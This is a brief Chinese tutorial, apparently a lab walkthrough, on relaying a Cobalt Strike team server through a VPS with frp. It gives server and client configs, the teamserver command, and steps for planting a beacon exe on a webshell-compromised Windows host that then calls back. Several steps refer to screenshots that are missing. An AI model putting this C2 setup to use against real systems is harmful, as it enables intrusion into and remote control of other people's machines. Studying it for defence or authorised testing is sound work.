CS使用frp实现内网穿透
跳板机(vps):124.220.93.x
攻击机 kali:192.168.8.8 ,主要架设CS,启动 CS
靶机:windows server 2012:124.222.180.x,也就是拿到WebShell的机器
1. vps 服务端frps.ini配置
[common]
bind_port = 7000
#以下可不要
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true
启动服务端
2. kali 客户端frpc.ini配置(攻击机)
[common]
server_addr = 124.220.93.149
server_port = 7000
[CS_Server_9050]
type = tcp
local_ip = 192.168.8.8
local_port = 50050
remote_port = 9050
[test_Beacon_9080]
type = tcp
local_ip = 192.168.8.8
local_port = 9080
remote_port = 9080
启动客户端
当运行成功之后,云服务器端(vps)会显示建立连接
3. cobaltstrike
cs 服务端
sudo ./teamserver 192.168.8.8 123
在这里可以看到端口是50050,此时的端口要和上面的frpc.ini中端口对应
因为这个端口的流量转发给了Linux的9050端口
cs 客户端
这里需要使用vps的ip和端口(9050)来操作
./cobaltstrike
当连接建立成功之后,frp服务端会有反应
此时成功将内网的CS使用frp进行了穿透
接下来就是攻击测试了
4. 设置监听
设置完成后点击保存
完成后如下:
5. 上线测试
attack生成攻击exe
选择监听器
点击生成
保存生成好的exe
上传到获取webshell的靶机(被攻击的机器)
运行
在cs客户端查看,发现成功上线(鼓掌😎)
此时vps服务端也会收到上线后的消息
执行操作
shell ipconfig
shell whoami